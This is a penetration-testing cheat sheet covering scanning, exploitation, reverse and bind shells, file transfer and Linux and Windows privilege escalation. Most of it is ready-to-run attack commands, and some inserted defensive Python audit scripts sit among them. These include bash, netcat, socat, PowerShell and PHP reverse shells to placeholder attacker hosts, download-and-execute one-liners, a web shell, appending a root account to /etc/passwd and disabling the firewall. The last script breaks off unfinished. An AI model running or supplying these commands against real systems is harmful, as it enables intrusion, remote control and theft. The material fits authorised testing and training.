Penetration Test Playbook
Passive Information Gathering
Active Information Gathering
Network-wide Enumeration
What have we got from our network-wide enumeration (if applicable)?
cd network_enumeration
grep -r '<new victim IP or hostname or user>' .
Manually check for reverse lookups e.g. host <victim IP>
Other Boxes?
What have we got from breaking into other boxes on the network (if applicable)?
cd box_enumeration
grep -r '<new victim IP or hostname or user>' .
Automate it
sudo ~/Documents/tools/nmapAutomator/nmapAutomator.sh --type All --host <victim IP address>
cd 01_autorecon/scans/
cat *
python3 ~/Documents/tools/AutoRecon/src/autorecon/autorecon.py <victim IP address>
cd 01_nmapautomator/<nmap OR recon>/
cat *
Quick Nmap Scan
sudo nmap --top-ports 20 --open <victim IP>
Quick Nmap UDP Scan
sudo nmap -sU --top-ports 20 --open <victim IP>
Heavyish Nmap Scan
sudo nmap <victim IP> -p- -sT --reason
sudo nmap <victim IP> -p <ports you've found that are open> -sV --reason
sudo nmap -sS -sV -A -O -p <ports that you've found are open> <IP address>
sudo nmap -sS -sV -A -O -p- <IP address>
Other Nmap Scans
nmap -vv --reason -Pn -sV -sC --version-all -oN <output file> <victim IP>
nmap -vv --reason -Pn -A --osscan-guess --version-all -p- <victim IP>
Nmap NSE Scripts
Find some relevant NSE scripts with
ls -al /usr/share/nmap/scripts/ | grep <service>
then scan with
sudo nmap <victim IP> --script=<script found above>
also check for script arguments to run things properly:
for script in $(ls /usr/share/nmap/scripts/ | grep <service>); do nmap --script-help $script; done
53 DNS
Set up your machine for the environment:
sudo nmap -sS -sV -A -p 53 10.11.1.0/24 -oG 01_dns_enum.txt
cat 01_dns_enum.txt | grep -i open | cut -d ' ' -f 2 > 01_dns_servers.txt
then edit /etc/resolv.conf to use em, e.g. add lines like the following: nameserver 10.11.1.20
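As an added example (not part of the original playbook), here is a small Python parser for the grepable (-oG) file the scan above writes. It does properly what the grep/cut pipeline approximates: it reads the Ports field of each Host line, keeps only hosts where the requested port is actually in state open (rather than every line containing the word "open"), and emits the nameserver lines for /etc/resolv.conf. The -oG text below is a constructed sample, not a real scan, and the function names are my own.

```python
import re

# Constructed sample of nmap -oG (grepable) output, shaped like the 01_dns_enum.txt
# written by "nmap ... -p 53 ... -oG". Not a real scan; the hosts are made up.
SAMPLE_GNMAP = """# Nmap 7.91 scan initiated (constructed sample)
Host: 10.11.1.20 ()\tStatus: Up
Host: 10.11.1.20 ()\tPorts: 53/open/tcp//domain//ISC BIND 9.4.2/\tIgnored State: closed (0)
Host: 10.11.1.21 ()\tStatus: Up
Host: 10.11.1.21 ()\tPorts: 53/filtered/tcp//domain///
Host: 10.11.1.22 (dc01.example.local)\tStatus: Up
Host: 10.11.1.22 (dc01.example.local)\tPorts: 53/open/tcp//domain//Microsoft DNS/, 53/open/udp//domain///
# Nmap done at (constructed sample) -- 3 IP addresses (3 hosts up) scanned
"""

# One entry of the Ports field: port/state/proto/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"^(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/$")


def parse_gnmap(text):
    """Return {host: [(port, proto, state, service, version), ...]} from -oG output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                                   # comment and blank lines
        fields = line.split("\t")
        host = fields[0].split()[1]                    # "Host: <ip> (<name>)" -> <ip>
        ports = hosts.setdefault(host, [])
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue                               # Status:, Ignored State:, ...
            for entry in field[len("Ports:"):].split(","):
                m = PORT_RE.match(entry.strip())
                if m:
                    port, state, proto, _owner, service, _rpc, version = m.groups()
                    ports.append((int(port), proto, state, service, version))
    return hosts


def hosts_with_open_port(text, port, proto="tcp"):
    """Hosts where <port>/<proto> is in state open (what grep -i open | cut approximates)."""
    return sorted(
        host
        for host, ports in parse_gnmap(text).items()
        if any(p == port and pr == proto and st == "open" for p, pr, st, _, _ in ports)
    )


def resolv_conf_lines(text, port=53):
    """nameserver lines for /etc/resolv.conf, one per host answering DNS over TCP."""
    return ["nameserver " + host for host in hosts_with_open_port(text, port)]


if __name__ == "__main__":
    for host, ports in parse_gnmap(SAMPLE_GNMAP).items():
        print(host, ports)
    print("\n".join(resolv_conf_lines(SAMPLE_GNMAP)))
```

Point it at the real file with parse_gnmap(open("01_dns_enum.txt").read()); the version field is kept per port so the same parse feeds the version write-up the Exploitation section asks for.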
Find DNS Servers
host -t mx google.com
host -t txt google.com
dnsenum google.com
dnsrecon -d google.com -t axfr
DNS Zone Transfer
host -l <domain name> <dns server address>
80, 8080 HTTP, 443 HTTPS, 8009 Apache Tomcat / Jserv
nmap -vv --reason -Pn -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" <victim IP>
If port 80 or 443 is open - visit it in a browser, curl -i <victim IP>, curl -i -L <victim IP>, view source, inspect element, look for elements supporting user interaction, cookies being set, URL manipulation, directory traversal
curl <victim IP address>/robots.txt -s | html2text
View robots.txt as a Search Engine:
curl --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)" http://<victim IP address>/robots.txt
See AutoRecon and NmapAutomator output.
SSL Enumeration:
sslscan <victim IP>
curl -v '<url>'
curl -v '<url>' --insecure
Web Application Scanning:
gobuster dir -u <IP address> -w <wordlist>
dirb http://<domain or IP address> <wordlist>
Are there any other wordlists we should look at trying based on gobuster or dirb results?
ls -al /usr/share/wordlists/SecLists/Discovery/Web-Content/
ls -al /usr/share/wordlists/dirb/
dirb http://10.11.1.71 /usr/share/wordlists/SecLists/Discovery/Web-Content/CGIs.txt -N 302
gobuster dir -u <IP address> -w /usr/share/wordlists/SecLists/Discovery/Web-Content/IIS.fuzz.txt
Remember that gobuster doesn't recursively search, dirb does by default; if you're not finding anything useful, kick off the slower boi
nikto -h <IP address>
wpscan --url <domain> --enumerate ap,at,cb,dbe
nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 <victim IP address>
22 SSH, 3389 RDP, 5900 VNC
ls -lh /usr/share/nmap/scripts/*<service>*
nmap 10.11.1.71 -p 22 -sV --script=ssh-hostkey
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <victim IP address>
Sometimes need -Pn
Attempt to connect to open ports using ssh, rdesktop, telnet, nc, ftp, smbclient, etc. - can you interact at all, is authentication required, is there further version information or fingerprints or keys or domains etc. provided back, is there a README.md, is there a robots.txt?
rdesktop -u <username> <victim IP address>
139 NetBios SSN, 445 SMB
sudo nmap -sV -sS -p 139,445 --script=smb-os-discovery <IP address>
sudo nmap -sV -sS -p 139,445 --script=smb-enum* <IP address>
sudo nmap -sV -sS -p 139,445 --script=smb-vuln* <IP address>
nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 <victim IP>
sudo nbtscan <IP address>
sudo enum4linux -a <IP address>
smbmap -H <victim IP>
Not getting the version out of Nmap? Set up Wireshark to capture a connection to a guest session, then inspect the packet called Session Setup AndX Response; you should get a field called Native LAN Manager which has a version number in it.
Or, also if you aren't getting a version, in one terminal type this: sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]' port 139, and in a second window: smbmap -H 10.11.1.115 -u '' -p '' -P 139, then go back to the first one to see what you're capturing, a version should pop.
Log in to a SMB Server:
smbclient //<victim IP address>/<share name>
smbclient -L <name of server>
Logging in using Guest account:
smbclient //<victim IP address>/<share folder> -U" "%" "
smbclient //<victim IP address>/<share name> -U guest%
smbclient -L \\<victim IP address>
smbmap -H <victim IP address> -u '' -p '' -P 139
Enumerate a DC: add a line to /etc/hosts resolving the IP to the domain name, then run Nmap scans against the domain name.
Enumerate Usernames of DC: make sure your domain is resolved nicely in /etc/hosts then run ./kerbrute userenum --dc thedomain.local -d thedomain.local <wordlist>
25 SMTP, 110 POP3, 995 POP3S, 143 IMAP, 993 IMAPS
sudo nmap <victim IP> -sV -p 25 --script smtp*
sudo nmap <victim IP> -sV -p 110 --script pop*
Enumerate users by connecting via telnet <victim IP> 25 and running the command VRFY <user> or EXPN <user>; test for mail, daemon, root, backup, and other user names found through other enumeration techniques, or use nc with the -C option to fix line endings
111 RPCBind, 135 MSRPC, 1025 MSRPC, 2049 NFS
sudo nmap -sV -p 111 --script=rpcinfo <IP address>
sudo nmap -sV -sS -p 111 --script nfs* <IP address>
sudo nmap -sV -p 135 --script=msrpc-enum <victim IP address>
rpcinfo -s <victim IP address>
Show mounting information for an NFS server: showmount -a <victim IP address>
Mount a NFS share on Kali: sudo mkdir /var/<share name>, sudo mount -t nfs <victim IP address>:/<share name> /var/<share name>, to verify it mounted successfully use mount or df -h
Unmount a NFS share on Kali: use either of the following: umount <victim IP address>:<share name> OR umount /var/<share name>; if it doesn't detach because it's in use, use fuser -m MOUNT_POINT to see which processes are using it, and if you still have trouble you can use the --lazy option to unmount a busy file system as soon as it's not busy anymore: umount -l MOUNT_POINT
21 FTP
sudo nmap -p 21 -sV --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-syst,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum <victim IP address>
If anonymous log in is allowed: ftp <victim IP> with user anonymous and any password, and make sure to set transfer mode using binary so any binary files getting uploaded don't get mangled.
Common Useful Commands
help
pwd
ls
get <filename>
put <filename>
1433 MS-SQL, 3306 MySQL
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <victim IP address>
sqsh -S <victim IP address> -U sa -P <password>, then go see the MS SQL xp_cmdshell card for setting it up if not configured.
161 SNMP
sudo nmap -sU --open -p 161 <IP address>
onesixtyone -c community -i <IP address>
snmpwalk -c <public, private, manager> -v1 <IP address>
Exploitation
Using Public Exploits
Finish your enumeration above, write-up version numbers, be thorough
searchsploit <term> --exclude="(PoC)|/dos/"
Google all the versions and any CVE's etc. that came up during enumeration.
Are there any named vulnerabilities or services you can search for Nmap scripts for, to confirm your victim is vulnerable? Are there any PoCs out on the internet for those vulnerabilities to throw?
Are there any Nmap scripts for named vulns you've found? ls -lah /usr/share/nmap/scripts/*<vuln name e.g. shellshock>*
Check how recent the public exploits are, pick the most recent one, if there's old libraries see if you can port them to new ones.
Finding exploits - starting with services and applications running before moving on to operating system and kernel exploits - searchsploit <keywords> --exclude='/dos/', searchsploit -x <exploit code>
Prepare Virtual Environment for Exploitation:
python3 -m venv virtual-env-name
virtualenv -p /usr/bin/python2.7 virtual-env-name
Avoiding SSL and SelfSignedCerts in Python:
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  # verify=False otherwise warns on every request
url = 'https://<victim IP address>/'
res = requests.get(url, allow_redirects=False, verify=False)
print(res.status_code)
Compile Linux 32-bit Binary on 64-bit Kali:
gcc -m32 exploit.c -o exploit
Compile Linux 64-bit Binary on 64-bit Kali:
gcc exploit.c -o exploit
gcc -Wl,--hash-style=both -m32 -Wall -o exploit exploit.c
Compile Windows 32-bit Binary on 64-bit Kali:
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
i686-w64-mingw32-gcc exploit.c -o exploit.exe
Compile Windows 64-bit Binary on 64-bit Kali:
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
Web Application Attacks
Did you find any admin consoles? admin:<blank>, admin:admin, admin:password, root:<blank>, root:root, root:password, username:username, admin:adminadmin, any users/passwords from other boxes that might have been reused?
Generate a lil wordlist based on a login page you've got to: cewl http://<url of login page> -w wordlist.txt
Is the application open source and hosted in some repository? Can we find default credentials / locations sensitive information is stored / identifiers for sensitive information we could grep around for?
XSS: < > ' " { } ;
Directory Traversal: ../, ..\
File Inclusion: http://domain/page.php?file=<do some things>
SQL Injection: ', or 1=1;#, or 1=1 LIMIT 1;#
Reviewing and manipulating network traffic with BurpSuite, tcpdump, and Wireshark
Client-Side Attacks
Passive Information Gathering: Google, Shodan, social media, forums to find information about externally facing infrastructure, operating systems of, browser types, versions, installed plugins, User-Agent strings.
Active Information Gathering: social engineering, client fingerprinting.
Leveraging HTML Applications (.hta)
Exploiting Microsoft Office.
General Shells
ls -al /usr/share/webshells/
Test payloads:
whoami
echo $USER && cat /etc/issue
phpinfo()
Powercat Reverse:
powercat -c <attacker IP> -p 443 -e cmd.exe, catch with sudo nc -lvp 443
Powercat Bind:
powercat -l -p 443 cmd.exe, connect to with nc <victim IP> 443
Powercat - generate encoded reverse shell, then send to attacker machine from victim:
powercat -c <attacker IP> -p 443 -e cmd.exe -ge > encoded_reverseshell.ps1
powershell.exe -E <Base64 encoded string stored in encoded_reverseshell.ps1>
General Shell Non-staged:
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker machine> LPORT=443 -f exe -o shell_reverse.exe
General Shell Staged:
msfvenom -p windows/shell/reverse_tcp LHOST=<attacker machine> LPORT=443 -f exe -o shell_reverse.exe
Apache Tomcat / Java Application:
msfvenom -p java/shell_reverse_tcp LHOST=<attacker machine> LPORT=4444 -f war -o shell.war
PHP:
<?php passthru($_GET['cmd']);?>
<?php $sock=fsockopen("<controller IP address>",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>
Get Shells with PHP:
<?php system("wget <attacker IP address>/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?>
Python Reverse:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker machine>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Linux Shells
Bash Reverse:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <listener IP> <listener port> >/tmp/f
/bin/bash -i >& /dev/tcp/<listener IP>/443 0>&1
Netcat Reverse (Linux Victim):
# the shell
nc -nv <attacker IP> 1234 -e /bin/bash
# catch with
sudo nc -nvlp 1234
Netcat Bind (Linux Victim):
# the shell
nc -nvlp 4444 -e /bin/bash
# connect to with
nc -nv <victim IP> 4444
Socat Bind (Linux Victim):
# the shell
socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash
# connect to with
socat - TCP4:<remote IP address>:4443
Socat Reverse (Linux Victim):
# the shell
socat TCP4:<remote IP address>:443 EXEC:/bin/bash
# catch it with
socat -d -d TCP4-LISTEN:443 STDOUT
Get a more stable TTY with Socat: listen with first command, then send shell with:
socat file:`tty`,echo=0,raw tcp-listen:4444
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attacker IP address>:4444
Windows Shells
Running executables from Windows command prompt:
C:\Windows\System32\cmd.exe /c <enter executable / command here>
start <enter command / executable here>
Netcat Reverse (Windows Victim):
# the shell
ncat -nv <attacker IP> 4444 -e /mnt/c/Windows/system32/cmd.exe
# catch with
sudo nc -nvlp 4444
Netcat Bind (Windows Victim):
# the shell
ncat -nvlp 4444 -e /mnt/c/Windows/system32/cmd.exe
# connect to with
nc -nv <victim IP> 4444
Socat Reverse (Windows Victim):
# the shell
socat TCP4:<remote IP address>:4443 EXEC:'cmd.exe',pipes
# catch it with
socat -d -d TCP4-LISTEN:443 STDOUT
Socat Bind (Windows Victim):
# the shell
socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes
# connect to with
socat - TCP4:<remote IP address>:4443
PowerShell Reverse:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker machine>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();};$client.Close()"
PowerShell Bind:
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' +(pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
PowerShell Using nishang:
powershell iex (New-Object Net.WebClient).DownloadString('http://<attacker IP>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacker IP> -Port 1337
Post-Exploitation
Transferring Files
Transferring files with socat:
# serve it up with
sudo socat TCP4-LISTEN:443,fork file:some_file.txt
# download it with
socat TCP:<remote IP address>:443 file:some_file.txt,create
Transferring files by serving em up on HTTP:
python2 -m SimpleHTTPServer 8888
python3 -m http.server 7331
then use wget, curl --output, or visit in a browser on your victim; or put your resource at /var/www/html, run sudo systemctl start apache2, then use wget on your victim.
Transferring files with nc to Linux host:
# on attacker machine
sudo nc -q 5 -nvlp 80 < <some script>.sh
# then on victim (/dev/tcp needs bash)
bash -c 'cat < /dev/tcp/<attacker machine>/80' | sh
Execute from memory and send output back to the attacker:
# on attacker machine
nc -nvlp 9002 | tee output.out
# then on victim
curl <attacker machine>/<script to execute>.sh | sh | nc <attacker machine> 9002
Transferring files with SMB (note you have to serve these up as root on your machine, and use a Python virtual environment because you're gonna need Python 2 and the Impacket library):
# on attacking machine:
smbserver.py a /usr/share/windows-binaries/
# on victim machine:
\\<attacker IP>\a\whoami.exe
Transferring files with ftp: ftp <victim IP>, binary to set binary mode if you're transferring executables, just in case it's in ASCII mode and wrecks the file, put <file name on attacker machine>; also use this to transfer files from victim to attacker machine, if FTP is around, using ftp <attacker IP> and the user:password of offsec:offsec
Transferring Files with certutil:
certutil.exe -urlcache -split -f http://<attacker machine>/<file to transfer>
Checking file integrity after upload:
powershell get-filehash -Algorithm MD5 <file name> or md5sum <file name>
Download file to disk with PowerShell:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<attacker IP address>/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
Run file in memory with PowerShell:
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://<attacker IP address>/helloworld.ps1')
General Privilege Escalation
Non-interactive to Interactive:
python -c 'import pty; pty.spawn("/bin/bash")'
Enumeration and Finding Exploits - starting with services and applications running before moving on to operating system and kernel exploits:
searchsploit <keywords> --exclude='/dos/'
searchsploit -x <exploit code>
Own /bin/bash: chmod +s /bin/bash
/bin/bash -p
UDF in MySQL: select do_system('cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash'); then from local shell run /tmp/rootbash -p
Enumerating Linux for Privilege Escalation
Is your shell interactive - su, what kind of shell is it - echo $SHELL, do you need to fix your PATH? Fix PATH if you need to:
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
whereis perl
whereis python
whereis nc
whereis nmap
Utilise Nmap: sudo nmap --interactive, !sh
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
/tmp/rootbash -p
Automating Enumeration and Privilege Escalation: LinEnum, Linux Smart Enumeration lse.sh, unix-privesc-check
View real, effective, and saved user and group IDs:
id
cat /proc/$$/status | grep "[UG]id"
More info about the box:
hostname
cat /etc/issue
cat /etc/*-release
uname -a
uname -i
ip a
ifconfig
lsb_release -a
Running Processes:
ps axu
ps aux | grep "^root"
<program> --version
<program> -v
dpkg -l | grep <program>
rpm -qa | grep <program>
Can we use sudo?
sudo <program>
sudo -u <username> <program>
sudo -l
sudo -s
sudo -i
sudo /bin/bash
sudo passwd
Anything useful in GTFOBins? Any config files hanging around with passwords in em? Any SSH keys hanging around?
Current user information:
whoami
echo %username%
id
who
pwd
last
cat ~/<.bash_profile, .bashrc, .bash_logout>
cat /etc/<profile, bashrc>
env
set
cat ~/.*history | less
Is /etc/shadow readable?
head -n 1 /etc/shadow
echo '<hash from above command>' > hash.txt
john --format=sha512crypt --wordlist=rockyou.txt hash.txt
Is /etc/shadow modifiable?
cat /etc/shadow > etc_shadow_backup.txt
mkpasswd -m sha-512 newpassword
vim /etc/shadow
Is /etc/passwd modifiable? Make a new root user if you find you can write to /etc/passwd:
# generate password with
openssl passwd evil
# then
echo "root2:<generated openssl hash>:0:0:root:/root:/bin/bash" >> /etc/passwd
# then log in with
su root2
Looking for readable backup files:
ls -al /
ls -al /home/user
ls -al /tmp
ls -al /var/backups
Found a readable private SSH key? Download root_key to local machine then:
chmod 600 root_key
ssh -i root_key root@<victim machine>
Find SUID Binaries:
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
# find SUID and SGID
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
Find all writeable files in /etc:
find /etc -maxdepth 1 -writable -type f 2> /dev/null
Find all readable files in /etc:
find /etc -maxdepth 1 -readable -type f 2> /dev/null
Find Writeable Files:
find / -writable ! -user <whoami> -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
Find all directories which can be written to: find / -executable -writable -type d 2> /dev/null
Files Edited in Last 10 Minutes:
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
Who else uses the box:
cat /etc/passwd
cat /etc/sudoers
sudo -l
grep -vE "nologin|false" /etc/passwd
grep -v '^#' /etc/ssh/sshd_config | uniq
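Added example, not from the original page: a Python checker that parses /etc/passwd and reports the account anomalies a defender (or a tester writing up findings) looks for after the checks above: an extra uid-0 account of the kind the /etc/passwd write trick earlier in this section creates, a password hash or an empty password stored in passwd itself rather than in shadow, and which accounts still have an interactive shell (the grep -vE "nologin|false" view). The passwd content is a constructed sample and the function names are my own.

```python
# Constructed /etc/passwd sample (not taken from any real host). The root2 line has
# the shape of a uid-0 account appended by someone who could write to the file.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
root2:$6$constructed$hashgoeshere:0:0:root:/root:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
legacy:x:1001:1001::/home/legacy:/bin/false
"""

# Shells that do not give an interactive login (extend for your distribution).
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync", ""}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; a line without exactly 7 fields is itself suspicious."""
    users = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            raise ValueError("line %d: expected 7 colon-separated fields, got %d" % (lineno, len(parts)))
        name, pw, uid, gid, gecos, home, shell = parts
        users.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users


def audit_passwd(text):
    """Return (finding, account) pairs worth investigating, in file order."""
    findings = []
    for u in parse_passwd(text):
        # Any uid 0 account besides root is a second superuser, whatever it is named.
        if u["uid"] == 0 and u["name"] != "root":
            findings.append(("extra-uid0", u["name"]))
        # "x" means the hash lives in /etc/shadow; "*" or "!..." is a locked account.
        if u["pw"] == "":
            findings.append(("empty-password", u["name"]))
        elif u["pw"] not in ("x", "*") and not u["pw"].startswith("!"):
            findings.append(("hash-in-passwd", u["name"]))
    return findings


def login_accounts(text):
    """Accounts whose shell grants an interactive login."""
    return [u["name"] for u in parse_passwd(text) if u["shell"] not in NON_LOGIN_SHELLS]


if __name__ == "__main__":
    for finding, account in audit_passwd(SAMPLE_PASSWD):
        print("%-16s %s" % (finding, account))
    print("interactive:", ", ".join(login_accounts(SAMPLE_PASSWD)))
```

Run it against the real file with audit_passwd(open("/etc/passwd").read()); a hash in passwd is world-readable, so that finding also feeds the john step above.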
Connectivity info, compare to port scan to see what's allowed through the firewall:
/sbin/route
netstat -atulpn
ss -anp
/etc/iptables
arp -e
chkconfig --list
grep 80 /etc/services
Environment variables - is LD_PRELOAD or LD_LIBRARY_PATH available in the PATH? Can we mess with what's in the PATH using cron jobs?
Finding programs that try to execute other programs:
strings /path/to/file
strace -v -f -e execve <command> 2>&1 | grep exec
ltrace <command>
Investigate scheduled jobs:
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny*
cat /etc/services
for dir in $( ls /etc/ | grep cron); do ls -al /etc/$dir; done
NFS:
# on target
cat /etc/exports
showmount -e 192.168.1.25
# locally on kali as root
mkdir /tmp/nfs
mount -o rw,vers=2 192.168.1.25:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf
# and finally on target
/tmp/shell.elf
What's installed:
dpkg -l
rpm -qa
lsmod
/sbin/modinfo <module>
ls -alh /usr/bin/
ls -alh /sbin/
Investigate services:
cat /etc/fstab | grep <service name>
service --status-all
ls /etc/init.d
What's in the web root?
Debian - /etc/apache2/
CentOS - /etc/httpd/
Find document root when just config is stored at the web root - grep -Ri DocumentRoot, often at /var/www/html/
Are any services misconfigured/have vulnerable plugins - cat /etc/*.conf, where can we write things - find / -writable -type d 2>/dev/null
Passwords in memory: strings /dev/mem -n10 | grep -i PASS
Enumerating Windows for Privilege Escalation
Is your shell interactive, what kind of shell is it, do you need to fix your PATH, what tools are installed and available to you?
Automating Enumeration and Privilege Escalation: LovelyPotato, windows-privesc-check, JAWS, windows-exploit-suggester, Sherlock.ps1, Watson, Windows Exploit Suggester Script
type
dir
del
net user test 1234 /add
net localgroup administrators test /add
cacls *.* /t /e /g domainname\administrator:f
netsh firewall set opmode disable
where perl
where python
where ncat
powershell $PSVersionTable
Current user information:
whoami
whoami /priv
whoami /groups
net user
net user <username>
net user <username> /domain
net accounts
More info about the box:
hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
mountvol
wmic qfe get Caption, Description, HotFixID, InstalledOn
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
net share
Connectivity info - make sure to compare this to what you already know, are there more ports here that you couldn't see with your earlier scans:
ipconfig /all
route print
netstat -ano
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
Default Writeable Folders:
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
Where is the web root? Windows IIS - C:\inetpub\wwwroot\
Finding Unquoted Paths:
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
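Added example, not part of the original page: the unquoted service path check above done in Python over service data exported with wmic /format:csv (the CSV below is a constructed sample, and the column set is an assumption about that export). It applies the same filters as the findstr chain (auto-start, outside C:\Windows, not already quoted) but tests the executable path itself for spaces rather than the whole command line, and for each hit lists the intermediate paths whose parent directories a defender should confirm are not writable by unprivileged users, plus the quoted form to put back into the service configuration.

```python
import csv
import io
import re

# Constructed export shaped like "wmic service get Name,DisplayName,PathName,StartMode /format:csv"
# (the column set is an assumption about that export; the services are made up).
SAMPLE_WMIC_CSV = r'''
Node,DisplayName,Name,PathName,StartMode
HOST01,Windows Update,wuauserv,C:\Windows\system32\svchost.exe -k netsvcs,Auto
HOST01,Acme Backup Agent,AcmeBackup,C:\Program Files\Acme Corp\Backup Agent\agent.exe -service,Auto
HOST01,Contoso Updater,ContosoUpd,"""C:\Program Files\Contoso\updater.exe"" /svc",Auto
HOST01,Old Tool,OldTool,C:\Tools\oldtool.exe,Manual
HOST01,Legacy Sync,LegacySync,C:\Legacy Apps\sync.exe,Manual
'''

WINDOWS_DIR = "c:\\windows\\"   # services under the system directory are skipped, as in the findstr chain
EXE_RE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)


def executable_path(pathname):
    """The binary part of a service command line, with any arguments dropped."""
    m = EXE_RE.match(pathname)
    return m.group(1) if m else pathname.split(" ")[0]


def is_unquoted_with_spaces(pathname):
    """True when the path is not wrapped in quotes and the binary path itself contains a space."""
    p = pathname.strip()
    if p.startswith('"'):
        return False
    return " " in executable_path(p)


def search_prefixes(exe_path):
    """Locations Windows tries before the real binary: the path cut at each space, plus .exe.
    The parent directory of each must not be writable by unprivileged users."""
    return [exe_path[:i] + ".exe" for i, ch in enumerate(exe_path) if ch == " "]


def audit_services(csv_text, auto_only=True):
    """One finding per service whose unquoted binary path contains a space."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text.strip())):
        path = row["PathName"].strip()
        if auto_only and row["StartMode"].strip().lower() != "auto":
            continue
        if path.lower().startswith(WINDOWS_DIR):
            continue
        if is_unquoted_with_spaces(path):
            exe = executable_path(path)
            findings.append({
                "name": row["Name"],
                "path": path,
                "fix": '"%s"' % exe + path[len(exe):],   # quoted form for the service config
                "prefixes": search_prefixes(exe),
            })
    return findings


if __name__ == "__main__":
    for f in audit_services(SAMPLE_WMIC_CSV, auto_only=False):
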